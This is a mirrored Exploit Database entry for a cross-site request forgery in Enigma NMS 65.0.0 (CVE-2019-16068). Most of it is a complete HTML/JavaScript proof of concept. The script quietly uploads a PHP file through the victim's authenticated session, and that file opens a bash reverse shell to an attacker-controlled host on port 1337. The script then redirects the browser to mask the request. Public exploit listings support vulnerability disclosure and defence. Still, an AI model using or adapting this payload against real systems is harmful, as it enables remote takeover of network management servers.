Enigma NMS 65.0.0 – Cross-Site Request Forgery

• Exploit Database
• 14 阅读

• 作者： xerubus
  日期： 2019-09-09
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47363/

• #--------------------------------------------------------------------#
  # Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)#
  # Date:21 July 2019#
  # Author: Mark Cross (@xerubus | mogozobo.com) #
  # Vendor: NETSAS Pty Ltd #
  # Vendor Homepage:https://www.netsas.com.au/ #
  # Software Link: https://www.netsas.com.au/enigma-nms-introduction/#
  # Version: Enigma NMS 65.0.0 #
  # CVE-IDs: CVE-2019-16068# 
  # Full write-up: https://www.mogozobo.com/?p=3647#
  #--------------------------------------------------------------------#
  __
  ___ (~ )( ~)
   / \_\ \/ / 
  | D_ ]\ \/-= Enigma CSRF by @xerubus =- 
  | D _]/\ \ -= We all have something to hide =-
   \___/ / /\ \\
  (_ )( _)
  @Xerubus
  
  The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
  
  <html>
  <script>history.pushState('', '', '/')</script>
  <script>
  function submitRequest()
  {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
  xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
  xhr.withCredentials = true;
  
  var body = "-----------------------------208051173310446317141640314495\r\n" + 
  "Content-Disposition: form-data; name=\"action\"\r\n" + 
  "\r\n" + 
  "system_upgrade\r\n" + 
  "-----------------------------208051173310446317141640314495\r\n" + 
  "Content-Disposition: form-data; name=\"action_aux\"\r\n" + 
  "\r\n" + 
  "upload_file_complete\r\n" + 
  "-----------------------------208051173310446317141640314495\r\n" + 
  "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + 
  "Content-Type: application/x-php\r\n" + 
  "\r\n" + 
  "\x3c?php\n" + 
  "\n" + 
  "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + 
  "\n" + 
  "?\x3e\n" + 
  "\r\n" + 
  "-----------------------------208051173310446317141640314495\r\n" + 
  "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + 
  "\r\n" + 
  "evil.php\r\n" + 
  "-----------------------------208051173310446317141640314495--\r\n";
  
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i); 
  xhr.send(new Blob([aBody]));
  }
  submitRequest();
  window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
  </script>
  <body onload="submitRequest();" >
  </body>
  </html>